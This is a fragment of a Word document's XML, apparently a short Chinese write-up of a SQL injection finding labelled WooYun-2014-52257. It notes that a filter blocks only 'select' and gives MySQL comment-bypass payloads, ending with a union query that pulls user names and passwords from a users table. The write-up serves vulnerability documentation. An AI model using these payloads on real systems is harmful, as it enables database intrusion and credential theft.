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WooYun-2014-52257</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(sqli-mysql-01)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对过滤名单</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fuzz</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，只过滤掉了</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>selelt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，用</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>特有的方法构造</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>/*!00000*/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1 union /*!50000select*/ 1,2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15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23050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成功返回结果，进一步构造</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1++union+/*!50000select*/+user,password+from+users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15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395287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47</Words>
  <Characters>181</Characters>
  <CharactersWithSpaces>184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2017-07-20T10:54:46Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>zh-CN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-20T11:00:59Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>